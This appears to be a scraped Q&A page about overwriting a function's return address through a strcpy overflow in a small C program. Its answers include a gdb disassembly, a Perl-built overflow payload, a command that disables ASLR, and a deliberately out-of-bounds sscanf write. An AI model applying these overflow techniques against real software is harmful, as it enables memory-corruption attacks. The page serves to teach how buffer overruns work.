C Code how to change return address in the code?
Solution 1
For what I understand, you want the code to execute the instruction x=1;
and then jump over the next printf so it will only print x is 0
. There's no way to do that.
However, what could be done is making func() erase it's own return address so the code would jump straight to printf("\nx is 0\n\n");
. This means jumping over x=1;
too.
This is only possible because you are sending to func() whatever is passed through the cmd-line and copying directly to a fixed size buffer. If the string you are trying to copy is bigger then the allocated buffer, you'll probably end up corrupting the stack, and potentially overwriting the function's return address.
There are great books like this one on the subject, and I recommend you to read them.
Loading your application on gdb and disassembling the main function, you'll see something similar to this:
(gdb) disas main
Dump of assembler code for function main:
0x0804840e <main+0>: lea 0x4(%esp),%ecx
0x08048412 <main+4>: and $0xfffffff0,%esp
0x08048415 <main+7>: pushl -0x4(%ecx)
0x08048418 <main+10>: push %ebp
0x08048419 <main+11>: mov %esp,%ebp
0x0804841b <main+13>: push %ecx
0x0804841c <main+14>: sub $0x24,%esp
0x0804841f <main+17>: movl $0x0,-0x8(%ebp)
0x08048426 <main+24>: mov 0x4(%ecx),%eax
0x08048429 <main+27>: add $0x4,%eax
0x0804842c <main+30>: mov (%eax),%eax
0x0804842e <main+32>: mov %eax,(%esp)
0x08048431 <main+35>: call 0x80483f4 <func> // obvious call to func
0x08048436 <main+40>: movl $0x1,-0x8(%ebp) // x = 1;
0x0804843d <main+47>: movl $0x8048520,(%esp) // pushing "x is 1" to the stack
0x08048444 <main+54>: call 0x804832c <puts@plt> // 1st printf call
0x08048449 <main+59>: movl $0x8048528,(%esp) // pushing "x is 0" to the stack
0x08048450 <main+66>: call 0x804832c <puts@plt> // 2nd printf call
0x08048455 <main+71>: add $0x24,%esp
0x08048458 <main+74>: pop %ecx
0x08048459 <main+75>: pop %ebp
0x0804845a <main+76>: lea -0x4(%ecx),%esp
0x0804845d <main+79>: ret
End of assembler dump.
It's important that you notice that the preparation for the 2nd printf call starts at address 0x08048449
. In order to override the original return address of func()
and make it jump to 0x08048449
, you'll have to write beyond the capacity of char buffer[24];
. On this test I used char buffer[6];
for simplicity purposes.
While in gdb, if I execute:
run `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
this will successfully override the buffer and replace the address of return with the address I want it to jump to:
Starting program: /home/karl/workspace/stack/fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
x is 0
Program exited with code 011.
(gdb)
I will not explain every step of the way because others have done it so much better already, but if you want to reproduce this behavior directly from the cmd-line, you could execute the following:
./fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
Keep in mind that the memory addresses that gdb reports to you will probably be different than the ones I got.
Note: for this technique to work you'll have to disable a kernel protection first. But just if the command below reports anything different from 0:
cat /proc/sys/kernel/randomize_va_space
to disable it you'll need superuser access:
echo 0 > /proc/sys/kernel/randomize_va_space
Solution 2
The return address from func
is on the Stack, right near its local variables (one of them is buffer
). If you want to overwrite the return address, you have to write past the end of the array (possibly to buffer[24...27]
but i am probably mistaken - could be buffer[28...31]
or even buffer[24...31]
if you have a 64-bit system). I suggest using a debugger to find out the exact addresses.
BTW get rid of the ret
variable - you accomplish nothing by having it around, and it might confuse your calculations.
Note that this "buffer overrun exploit" is a bit hard to debug because strcpy
stops copying stuff when it encounters a zero byte, and the address you want to write to the stack probably contains such a byte. It will be easier to do it like this:
void func(char *str)
{
char buffer[24];
sscanf(str, "%x", &buffer[24]); // replace the 24 by 28, 32 or whatever is right
}
And give the address on the command-line as a hexadecimal string. This makes it a bit more clear what you're trying to do, and easier to debug.
Related videos on Youtube
Santosh V M
Updated on April 05, 2020Comments
-
Santosh V M over 3 years
I just wrote a C Code which is below :
#include<stdio.h> #include<string.h> void func(char *str) { char buffer[24]; int *ret; strcpy(buffer,str); } int main(int argc,char **argv) { int x; x=0; func(argv[1]); x=1; printf("\nx is 1\n"); printf("\nx is 0\n\n"); }
Can please suggest me as to how to skip the line printf("\nx is 1\n");. Earlier the clue which I got was to modify ret variable which is the return address of the function func.
Can you suggest me as to how to change the return address in the above program so that printf("\nx is 1\n"); is skipped.
I have posted this question because I don't know how to change the return address.
It would be great if you help me out.
Thanks
-
Talljoe over 12 yearsDanger! That is probably not what you want to do. It will cause you WAY too many problems.
-
Brian Roach over 12 yearsYour code makes no sense ... what are you trying to do?
-
Marc B over 12 yearsYou're basically trying to accomplish something like a 'delayed goto' - good luck. And enjoy all the forced crashes you're about to generate while trying to make this work.
-
karlphillipIt's not clear what you want to do. Do you want to have a separate program to do this? Are we talking about exploiting software? Shellcode? This is so dangerous
strcpy(buffer,str);
` -
jschmierAre you trying to do something similar to this?
-
-
anatolyg over 12 yearsI think it's important to understand how buffer overruns work, especially if you program in C, so providing help is important!
-
jschmier over 12 years
-
flolo over 12 years@anatolyg: Maybe, maybe not this results in buffer overrun, this depends heavy on the used architecture - imagine Harvard architectures or new stack smash protection mechanism, compiler could inline it (or omptimize it complete away), so much possiblites, so sensless question. In my eyes when he want to know something about buffer overruns he should ask therefor.
-
Amit over 9 yearsCan you explain how you wrote the following: print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"
-
Brian White over 6 yearsSome us might be trying to understand how this works in order to actually fix bugs. Not everyone is malicious.